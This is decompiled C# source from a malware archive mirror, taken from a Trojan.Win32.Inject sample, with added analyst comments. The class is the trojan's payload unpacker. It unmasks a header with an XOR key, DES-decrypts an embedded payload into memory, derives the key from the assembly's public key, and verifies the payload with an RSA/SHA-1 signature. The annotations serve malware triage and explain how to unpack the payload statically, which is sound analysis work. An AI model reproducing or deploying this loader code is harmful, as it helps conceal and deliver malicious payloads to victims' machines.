mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 21:35:27 +00:00
// Decompiled with JetBrains decompiler
// Type:
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
// Analyst annotation (decompiled, name-obfuscated type).
//
// This class turns an encrypted stream into a plaintext MemoryStream:
//   1. a small header is read (optionally XOR-masked with an 8-byte key that is
//      stored in the clear right after it),
//   2. the header supplies a DES IV, optionally a DES key, and a signature blob,
//   3. when no key is embedded, the DES key is taken from the executing
//      assembly's public key and the plaintext is checked against an RSA/SHA-1
//      signature made for that same key,
//   4. the rest of the input stream is DES-decrypted into memory.
//
// Triage notes: everything needed to recover the plaintext offline is either in
// the stream or in the assembly's public key, so the payload can be unpacked
// statically. DES and SHA-1 are legacy primitives; they only slow down casual
// inspection and bind the payload to the original signing key.
internal class \uE00C
{
  // Not referenced by name in the decompiled bodies; the same literals (8, 20, 4)
  // appear inline below, so these were presumably inlined by the compiler.
  private const int \uE000 = 8;
  private const int \uE001 = 20;
  private const int \uE002 = 4;

  // Four-byte markers filled in by the static constructor: ASCII "RSA1" and "RSA2".
  private static byte[] \uE003 = new byte[4];
  private static byte[] \uE004 = new byte[4];

  // Builds the two markers. 82, 83, 65 are 'R', 'S', 'A'; 49 is '1', 50 is '2'.
  // "RSA1" / "RSA2" are the magic values of CryptoAPI RSA public / private key blobs.
  static \uE00C()
  {
    byte[] sharedPrefix = new byte[] { (byte) 82, (byte) 83, (byte) 65 };
    for (int slot = 0; slot < sharedPrefix.Length; ++slot)
    {
      \uE00C.\uE004[slot] = sharedPrefix[slot];
      \uE00C.\uE003[slot] = sharedPrefix[slot];
    }
    \uE00C.\uE003[3] = (byte) 49;
    \uE00C.\uE004[3] = (byte) 50;
  }

  // Decrypts the stream and returns the plaintext, positioned at offset 0.
  //
  // Stream layout as read here:
  //   bool    header is XOR-masked
  //   uint16  header length
  //   byte[]  header
  //   byte[8] XOR key (present only when the first flag is set)
  //   ...     DES ciphertext (everything that follows)
  // Header layout (after unmasking):
  //   byte + bytes   IV length, IV
  //   bool           DES key is embedded
  //   byte           DES key length (+ key bytes only when embedded)
  //   int32 + bytes  signature length, signature
  //
  // Throws InvalidOperationException when the assembly public key is missing or
  // not 160 bytes, or when signature verification fails.
  // NOTE(review): the return values of Read() are ignored, so a truncated stream
  // leaves zero-filled fields instead of failing at the point of truncation.
  public static MemoryStream \uE000(Stream _param0)
  {
    BinaryReader outerReader = new BinaryReader(_param0);
    DESCryptoServiceProvider des = new DESCryptoServiceProvider();

    bool headerIsMasked = outerReader.ReadBoolean();
    int headerLength = (int) outerReader.ReadUInt16();
    byte[] header = new byte[headerLength];
    outerReader.Read(header, 0, headerLength);

    if (headerIsMasked)
    {
      // Repeating 8-byte XOR key, stored unprotected directly after the header.
      byte[] xorKey = new byte[8];
      outerReader.Read(xorKey, 0, 8);
      int pos = 0;
      while (pos < headerLength)
      {
        header[pos] ^= xorKey[pos % 8];
        ++pos;
      }
    }

    BinaryReader headerReader = new BinaryReader((Stream) new MemoryStream(header, false));

    int ivLength = (int) headerReader.ReadByte();
    byte[] iv = new byte[ivLength];
    headerReader.Read(iv, 0, ivLength);
    des.IV = iv;

    bool keyIsEmbedded = headerReader.ReadBoolean();
    int keyLength = (int) headerReader.ReadByte();
    byte[] desKey = new byte[keyLength];
    if (keyIsEmbedded)
    {
      headerReader.Read(desKey, 0, keyLength);
    }

    int signatureLength = headerReader.ReadInt32();
    byte[] signature = new byte[signatureLength];
    headerReader.Read(signature, 0, signatureLength);

    // Stays null when the key is embedded; in that case no signature check is done.
    RSACryptoServiceProvider verifier = (RSACryptoServiceProvider) null;
    if (!keyIsEmbedded)
    {
      // 160 bytes is the size of a strong-name public key blob holding a
      // 1024-bit RSA key (12-byte prefix + 20-byte blob header + 128-byte modulus).
      byte[] assemblyKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
      bool keyUsable = assemblyKey != null && assemblyKey.Length == 160;
      if (!keyUsable)
      {
        throw new InvalidOperationException();
      }

      // DES key = keyLength bytes of the public key blob starting at offset 12,
      // with the top bit of byte 5 forced on.
      Buffer.BlockCopy((Array) assemblyKey, 12, (Array) desKey, 0, keyLength);
      desKey[5] |= (byte) 128;

      verifier = new RSACryptoServiceProvider();
      verifier.ImportParameters(\uE00C.\uE000(assemblyKey));
    }

    des.Key = desKey;

    MemoryStream plaintext = new MemoryStream();
    // The outer reader is now positioned at the ciphertext.
    // \uE012.\uE000 is defined elsewhere; presumably it copies the first stream
    // into the second - confirm against that type.
    using (CryptoStream decrypting = new CryptoStream(outerReader.BaseStream, des.CreateDecryptor(), CryptoStreamMode.Read))
    {
      \uE012.\uE000((Stream) decrypting, (Stream) plaintext);
    }

    if (verifier != null)
    {
      plaintext.Position = 0L;
      bool signatureValid = \uE00C.\uE000(verifier, (Stream) plaintext, signature);
      if (!signatureValid)
      {
        throw new InvalidOperationException();
      }
    }

    plaintext.Position = 0L;
    return plaintext;
  }

  // Returns a copy of _param2 bytes of _param0 starting at _param1, or null when
  // the source is null or shorter than _param1 + _param2.
  private static byte[] \uE000(byte[] _param0, int _param1, int _param2)
  {
    bool inRange = _param0 != null && _param0.Length >= _param1 + _param2;
    if (!inRange)
    {
      return (byte[]) null;
    }

    byte[] slice = new byte[_param2];
    Array.Copy((Array) _param0, _param1, (Array) slice, 0, _param2);
    return slice;
  }

  // Parses an RSA key blob into RSAParameters.
  //
  // A 160-byte input is treated as a public key: "RSA1" is expected at offset 20
  // and only Exponent and Modulus are filled. Any other length is treated as a
  // private key: "RSA2" is expected at offset 8 and P, Q, DP, DQ, InverseQ and D
  // are filled as well. Field sizes are fixed for a 1024-bit key, and every
  // field is byte-reversed after extraction. A marker mismatch returns an empty
  // RSAParameters value rather than throwing.
  private static RSAParameters \uE000(byte[] _param0)
  {
    bool isPublicBlob = _param0.Length == 160;
    byte[] expectedMarker = isPublicBlob ? \uE00C.\uE003 : \uE00C.\uE004;
    int markerOffset = isPublicBlob ? 20 : 8;

    if (!\uE00C.\uE000(_param0, expectedMarker, markerOffset))
    {
      return new RSAParameters();
    }

    RSAParameters key = new RSAParameters();

    // Skip the 4-byte marker and the 4 bytes that follow it.
    int cursor = markerOffset + 8;

    key.Exponent = \uE00C.\uE000(_param0, cursor, 4);
    Array.Reverse((Array) key.Exponent);
    cursor += 4;

    key.Modulus = \uE00C.\uE000(_param0, cursor, 128);
    Array.Reverse((Array) key.Modulus);

    if (isPublicBlob)
    {
      return key;
    }
    cursor += 128;

    key.P = \uE00C.\uE000(_param0, cursor, 64);
    Array.Reverse((Array) key.P);
    cursor += 64;

    key.Q = \uE00C.\uE000(_param0, cursor, 64);
    Array.Reverse((Array) key.Q);
    cursor += 64;

    key.DP = \uE00C.\uE000(_param0, cursor, 64);
    Array.Reverse((Array) key.DP);
    cursor += 64;

    key.DQ = \uE00C.\uE000(_param0, cursor, 64);
    Array.Reverse((Array) key.DQ);
    cursor += 64;

    key.InverseQ = \uE00C.\uE000(_param0, cursor, 64);
    Array.Reverse((Array) key.InverseQ);
    cursor += 64;

    key.D = \uE00C.\uE000(_param0, cursor, 128);
    Array.Reverse((Array) key.D);

    return key;
  }

  // True when _param0 contains the bytes of _param1 at offset _param2.
  // No bounds check is made on _param0.
  private static bool \uE000(byte[] _param0, byte[] _param1, int _param2)
  {
    int i = 0;
    while (i < _param1.Length)
    {
      if ((int) _param1[i] != (int) _param0[_param2 + i])
      {
        return false;
      }
      ++i;
    }
    return true;
  }

  // Hashes the stream from its current position with SHA-1 and checks the
  // signature in _param2 against that hash using the RSA key in _param0.
  private static bool \uE000(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2)
  {
    SHA1Managed sha1 = new SHA1Managed();
    byte[] digest = sha1.ComputeHash(_param1);
    string sha1Oid = CryptoConfig.MapNameToOID("SHA1");
    return _param0.VerifyHash(digest, sha1Oid, _param2);
  }
}